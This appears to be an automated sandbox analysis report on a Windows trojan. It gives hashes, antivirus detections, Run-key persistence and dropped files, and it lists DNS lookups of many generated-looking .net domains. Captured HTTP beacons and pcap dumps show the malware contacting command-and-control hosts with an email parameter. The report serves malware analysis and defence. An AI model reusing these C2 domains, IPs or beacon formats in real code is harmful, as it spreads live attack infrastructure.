Analysis Date2015-08-03 17:50:13
MD50e478f5b6d3d2cb425ba404b95b9018d
SHA17fec2a45cefd0269f78e79cf0270823f6327bc50

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: df89a282f6c614c031a23e8ea808e2c0 sha1: cae84b9048073100b18de8b846ce2026cd2e0928 size: 296448
Section.rdata md5: 917b9479003a6db256cbd72b7a49c6e3 sha1: 245a1342132d29d5090ea15c449740a913b2c620 size: 33280
Section.data md5: 7c1162e071ccfb5081e348315bdd7d65 sha1: dd1ce6126cb3c71fbdd1767486781dbe75a38a51 size: 95232
Timestamp2014-10-30 09:50:52
PackerMicrosoft Visual C++ ?.?
PEhash6071cb397126716985591f0699d1abaed1b0424a
IMPhashe1263d0b3b8448429d20716241c150da
AVRisingno_virus
AVMcafeeTrojan-FEMT!0E478F5B6D3D
AVAvira (antivir)TR/ATRAPS.Gen2
AVTwisterno_virus
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVEset (nod32)Win32/Agent.VNC
AVGrisoft (avg)Error Scanning File
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Kryptik.DDQD!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7no_virus
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B2.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTSPY_NIVDORT.SMB
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVClamAVno_virus
AVDr. WebTrojan.DownLoader12.23288
AVF-SecureGen:Variant.Symmi.22722
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Foundation Remote Event Accounts ➝
C:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.dpf
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\qhtyggdsp\kdrfdefwaudi.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qhtyggdsp\nfmihewjiiou.exe"

Network Details:

DNSdoctoropinion.net
Type: A
128.199.249.48
DNSbrokenpromise.net
Type: A
69.172.201.208
DNSoutsidesupply.net
Type: A
64.74.223.47
DNSoutsideoffice.net
Type: A
108.162.202.47
DNSoutsideoffice.net
Type: A
108.162.201.47
DNSmovementarrive.net
Type: A
95.211.230.75
DNSbuildingsupply.net
Type: A
67.212.232.207
DNSbuildingoffice.net
Type: A
46.20.7.163
DNSstoresupply.net
Type: A
69.172.201.208
DNSseveralletter.net
Type: A
DNSmaterialletter.net
Type: A
DNSseveraldifferent.net
Type: A
DNSmaterialdifferent.net
Type: A
DNSmovementshould.net
Type: A
DNSoutsideshould.net
Type: A
DNSmovementshort.net
Type: A
DNSoutsideshort.net
Type: A
DNSmovementopinion.net
Type: A
DNSoutsideopinion.net
Type: A
DNSmovementpromise.net
Type: A
DNSoutsidepromise.net
Type: A
DNSbuildingshould.net
Type: A
DNSeveningshould.net
Type: A
DNSbuildingshort.net
Type: A
DNSeveningshort.net
Type: A
DNSbuildingopinion.net
Type: A
DNSeveningopinion.net
Type: A
DNSbuildingpromise.net
Type: A
DNSeveningpromise.net
Type: A
DNSstoreshould.net
Type: A
DNSmightshould.net
Type: A
DNSstoreshort.net
Type: A
DNSmightshort.net
Type: A
DNSstoreopinion.net
Type: A
DNSmightopinion.net
Type: A
DNSstorepromise.net
Type: A
DNSmightpromise.net
Type: A
DNSdoctorshould.net
Type: A
DNSprettyshould.net
Type: A
DNSdoctorshort.net
Type: A
DNSprettyshort.net
Type: A
DNSprettyopinion.net
Type: A
DNSdoctorpromise.net
Type: A
DNSprettypromise.net
Type: A
DNSfellowshould.net
Type: A
DNSdoubleshould.net
Type: A
DNSfellowshort.net
Type: A
DNSdoubleshort.net
Type: A
DNSfellowopinion.net
Type: A
DNSdoubleopinion.net
Type: A
DNSfellowpromise.net
Type: A
DNSdoublepromise.net
Type: A
DNSbrokenshould.net
Type: A
DNSresultshould.net
Type: A
DNSbrokenshort.net
Type: A
DNSresultshort.net
Type: A
DNSbrokenopinion.net
Type: A
DNSresultopinion.net
Type: A
DNSresultpromise.net
Type: A
DNSprepareshould.net
Type: A
DNSdesireshould.net
Type: A
DNSprepareshort.net
Type: A
DNSdesireshort.net
Type: A
DNSprepareopinion.net
Type: A
DNSdesireopinion.net
Type: A
DNSpreparepromise.net
Type: A
DNSdesirepromise.net
Type: A
DNSstrengthshould.net
Type: A
DNSstillshould.net
Type: A
DNSstrengthshort.net
Type: A
DNSstillshort.net
Type: A
DNSstrengthopinion.net
Type: A
DNSstillopinion.net
Type: A
DNSstrengthpromise.net
Type: A
DNSstillpromise.net
Type: A
DNSmovementsupply.net
Type: A
DNSmovementdistance.net
Type: A
DNSoutsidedistance.net
Type: A
DNSmovementoffice.net
Type: A
DNSoutsidearrive.net
Type: A
DNSeveningsupply.net
Type: A
DNSbuildingdistance.net
Type: A
DNSeveningdistance.net
Type: A
DNSeveningoffice.net
Type: A
DNSbuildingarrive.net
Type: A
DNSeveningarrive.net
Type: A
HTTP GEThttp://doctoropinion.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://brokenpromise.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://outsidesupply.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://outsideoffice.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://movementarrive.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://buildingsupply.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://buildingoffice.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://storesupply.net/index.php?email=narancss@yahoo.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 128.199.249.48:80
Flows TCP192.168.1.1:1032 ➝ 69.172.201.208:80
Flows TCP192.168.1.1:1033 ➝ 64.74.223.47:80
Flows TCP192.168.1.1:1034 ➝ 108.162.202.47:80
Flows TCP192.168.1.1:1035 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1036 ➝ 67.212.232.207:80
Flows TCP192.168.1.1:1037 ➝ 46.20.7.163:80
Flows TCP192.168.1.1:1038 ➝ 69.172.201.208:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 646f6374 6f726f70   ..Host: doctorop
0x00000070 (00112)   696e696f 6e2e6e65 740d0a0d 0a         inion.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 62726f6b 656e7072   ..Host: brokenpr
0x00000070 (00112)   6f6d6973 652e6e65 740d0a0d 0a         omise.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6f757473 69646573   ..Host: outsides
0x00000070 (00112)   7570706c 792e6e65 740d0a0d 0a         upply.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6f757473 6964656f   ..Host: outsideo
0x00000070 (00112)   66666963 652e6e65 740d0a0d 0a         ffice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6d6f7665 6d656e74   ..Host: movement
0x00000070 (00112)   61727269 76652e6e 65740d0a 0d0a       arrive.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6275696c 64696e67   ..Host: building
0x00000070 (00112)   73757070 6c792e6e 65740d0a 0d0a       supply.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 6275696c 64696e67   ..Host: building
0x00000070 (00112)   6f666669 63652e6e 65740d0a 0d0a       office.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6172 616e6373 73407961   mail=narancss@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737426 6c656e20 48545450 2f312e30   ost&len HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 73746f72 65737570   ..Host: storesup
0x00000070 (00112)   706c792e 6e65740d 0a0d0a0a 0d0a       ply.net.......


Strings